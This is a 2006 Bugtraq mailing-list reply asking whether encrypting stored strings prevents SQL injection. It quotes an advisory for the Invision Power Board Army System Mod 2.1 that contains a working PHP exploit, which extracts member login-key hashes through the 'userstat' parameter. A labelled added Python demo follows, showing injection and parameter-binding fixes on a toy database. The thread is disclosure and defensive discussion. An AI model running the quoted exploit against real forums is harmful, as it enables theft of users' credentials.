Date: Tue, 14 Feb 2006 01:29:05 +0200
From: Cristian Stoica <security@...cms.biz>
To: unsecure@...teme.com
Cc: bugtraq@...urityfocus.com, pen-test@...urityfocus.com
Subject: Re: Invision Power Board Army System Mod <= 2.1 SQL Injection Exploit


Hi,

    I have a question:
    If you use an encryption algorithm to store/get data into/from the
database, you will not be able to do SQL injections?
    With a simple encryption algorithm, I use php explode to transform
the string into an array and run the algorithm on each member of the array.
    After this is done I convert from array to string and insert/select
into/from the database.
    This way, if I have, let's say, the string "Hello world", I will get the
correct information if I try to run a select * from table where name
like "Hello %".
    With this I think I will not be vulnerable to SQL injection and I
will also have the information in the database secure.
    What do you think about this?

Best regards,
Cristian Stoica

P.S.: I know it will take a bit longer, but I think it's ok.
unsecure@...teme.com wrote:
> VULNERABLE PRODUCT
> -----------------------------------
> Invision Power Board Army System Mod
> Version: 2.1 and priors.
> Url: http://supersmashbrothers.2ya.com
> Vulnerability: Remote SQL Injection
> -----------------------------------------------------
>
>
> BACKGROUND
> ----------------------------
> Army System v2.1 is a very popular mod that has a ranking system built-in.
> This multiplayer RPG can easily be installed on every Invision Power Board v2.x.x.
> Source: "http://mods.invisionize.com/db/index.php/f/3347"
> Google: "Army System 2.1 by supersmashbrothers"
>
> ********************************************************************
> Requirements Minimum: Invision Board: 2.0.0 Final PHP: 4.1.0
> Recommended Invision Board: 2.0.1 PHP: 4.3.0 or better SQL
> Any sql will work fine as long as you have the driver.
> Minimum MySQL: 3.23
> Recommended MySQL: 3.23 or better
> Recommended for Larger sites: No memory limit and no safe mode for faster loading
> ********************************************************************
>
>
> VULNERABILITY
> -------------------------------
> Army System is prone to a SQL injection vulnerability. This issue is due to a failure 
> in the application to properly sanitize user-supplied input: the "userstat" parameter 
> is not correctly sanitised before being used in a SQL query. A specially crafted URL could 
> result in a compromise of the application, disclosure or modification of data, or may permit 
> an attacker to exploit vulnerabilities in the underlying database implementation.
>
>
> EXPLOIT
> ----------------
>
> <?php
> /* --------------------------- EXPLOIT ---------------------------
> Invision Power Board Army System Mod 2.1 SQL Injection Exploit
> Tested on: Latest version (2.1.0)
> Discovered on: 06.02.2006 by Alex & fRoGGz
> Credits to: SecuBox Labs
>
> PLEASE READ THIS !
> The query of the SQL Injection depends on the number of fields in the sql table
> We have successfully tested the exploit on a new fresh IPB 2.1.x with Army 
> System Mod 2.1 installed
>
> IN NO EVENT SHALL THE OWNER OF THIS CODE OR CONTRIBUTORS BE LIABLE 
> FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
> DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
> SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 
> CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
> OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
> OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
> */
>
> $target = "http://site.com/forums/"; // <--- Where ?
> $prefix = "ibf_"; // <--- SQL prefix ?
> $id = 1; // <--- Who ?
>
> print_r(get_infos($target,$prefix,$id));
> if(!get_infos($target,$prefix,$id)) echo "failed";
>
> function get_infos($target,$prefix,$id) {
>
>     $inject = "index.php?s=&act=army&userstat=0+UNION+SELECT+id,member_login_key,";
>     $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,";
>     $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,NULL,NULL,";
>     $inject.= "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,";
>     $inject.= "NULL+FROM+".$prefix."members+WHERE+id=";
>
>     $filename = $target . $inject . $id;
>
>     $handle = fopen ($filename, "r");
>         $infos = array();
>
>         if (feof($handle)) { continue 2; }
>         if ( $handle ) {
>                 while ( ($buffer = fgets( $handle )) )
>                 {
>                         if ( strpos( $buffer, "<td class='pformleft' width=\"35%\">Name</td>") ) {
>                                 $infos['md5'] = strip_tags ( fgets( $handle) );
>                 break;
>                         }
>                 }
>         }
>
>     fclose ($handle);
>
>         if (count($infos) == 1) return $infos;
>         return false;
> }
> ?>
>
>
>
> VENDOR STATUS
> ---------------------------
> There is no solution at the time.
> Edit the source code manually to solve this problem & many others !
>
>
> // You could temporarily fix the problem:
> // Find sources/action_public/army.php (line 486: $id2 = $this->ipsclass->input['ID'];)
> // After the line put:
> $id2 = ereg_replace('([^0-9])','',$id2);
> $id2 = (int)$id2;
> -----------------------------------------------------------------------------
>
>
> CREDiTS
> ------------------------------
> SecuBox Labs - fRoGGz & Alex
> Greets fly out to: Mark aka MT
> Visit: http://secubox.shadock.net
> --------------------------------------------
>
>   
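Added example (not part of this thread, and not code from the Army System mod or Invision Power Board): a small Python/sqlite3 script that puts the two questions on this page side by side, the "userstat" parameter from the advisory and the per-character "encryption" scheme proposed in the reply. The table layout, the rows, the shift substitution standing in for the cipher and all function names are constructed for the example; only the names "members" and "userstat" are taken from the thread. It shows that coercing the parameter to an integer (what the advisory's workaround does) and binding values as query parameters remove the injection, while a reversible per-character transform that is still spliced into the query text does not, because whoever knows the transform can submit its inverse image.

```python
import sqlite3
import string

# Alphabet for the toy per-character substitution (constructed for this example).
ALPHABET = string.printable[:95]  # digits, letters, punctuation, space


def shift_encode(text, shift=1):
    """Per-character substitution over ALPHABET, standing in for the 'simple
    encryption algorithm' run on each element of the exploded string.
    Characters outside ALPHABET pass through; shift=-1 inverts the transform."""
    out = []
    for ch in text:
        i = ALPHABET.find(ch)
        out.append(ch if i < 0 else ALPHABET[(i + shift) % len(ALPHABET)])
    return "".join(out)


def make_db():
    """In-memory stand-in for a forum database. Schema and rows are made up;
    only the table name 'members' and the 'userstat' column come from the thread."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE army (userstat INTEGER, name TEXT, rank TEXT);
        INSERT INTO army VALUES (1, 'admin', 'general');
        INSERT INTO army VALUES (2, 'bob', 'private');
        CREATE TABLE members (id INTEGER PRIMARY KEY, enc_name TEXT);
        """
    )
    # Names are stored already transformed, as the reply proposes.
    for mid, name in ((1, "admin"), (2, "bob")):
        conn.execute("INSERT INTO members VALUES (?, ?)", (mid, shift_encode(name)))
    return conn


def army_lookup_vulnerable(conn, userstat):
    """The pattern in the advisory: the request parameter becomes query text."""
    sql = "SELECT name, rank FROM army WHERE userstat=" + str(userstat)
    return conn.execute(sql).fetchall()


def army_lookup_safe(conn, userstat):
    """Coerce to the expected type (what the advisory's workaround does), then
    bind the value as a parameter so it can never be parsed as SQL."""
    try:
        userstat = int(userstat)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT name, rank FROM army WHERE userstat=?", (userstat,)
    ).fetchall()


def member_lookup_encoded_concat(conn, name):
    """Transform the value as proposed, but still splice it into the SQL text."""
    sql = "SELECT id FROM members WHERE enc_name LIKE '" + shift_encode(name) + "'"
    return conn.execute(sql).fetchall()


def member_lookup_encoded_param(conn, name):
    """Same transform, but the result is bound as a parameter and stays data."""
    return conn.execute(
        "SELECT id FROM members WHERE enc_name LIKE ?", (shift_encode(name),)
    ).fetchall()


def member_prefix_search(conn, prefix):
    """The 'name like "Hello %"' case: the wildcard is appended after the
    transform (the transform would otherwise rewrite it) and bound as data."""
    return conn.execute(
        "SELECT id FROM members WHERE enc_name LIKE ?", (shift_encode(prefix) + "%",)
    ).fetchall()


def attacker_preimage(payload):
    """A reversible per-character transform only moves the problem: whoever
    knows it submits the inverse image, so the transformed text that reaches
    the query is exactly the payload they chose."""
    return shift_encode(payload, -1)


if __name__ == "__main__":
    db = make_db()
    print(army_lookup_vulnerable(db, "0 OR 1=1"))      # both army rows
    print(army_lookup_safe(db, "0 OR 1=1"))            # []
    hostile = attacker_preimage("x' OR '1'='1")
    print(member_lookup_encoded_concat(db, hostile))   # both member ids
    print(member_lookup_encoded_param(db, hostile))    # []
    print(member_prefix_search(db, "ad"))              # [(1,)]
```

Run it directly to see the five lookups. Two caveats a practitioner would want: the transform can also emit LIKE metacharacters ('$' becomes '%' under this shift), which parameter binding does not address and which would need separate escaping if the stored form is used in a pattern; and encrypting stored data is a confidentiality measure, orthogonal to how the query text is assembled, so it neither adds to nor replaces parameterised queries.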


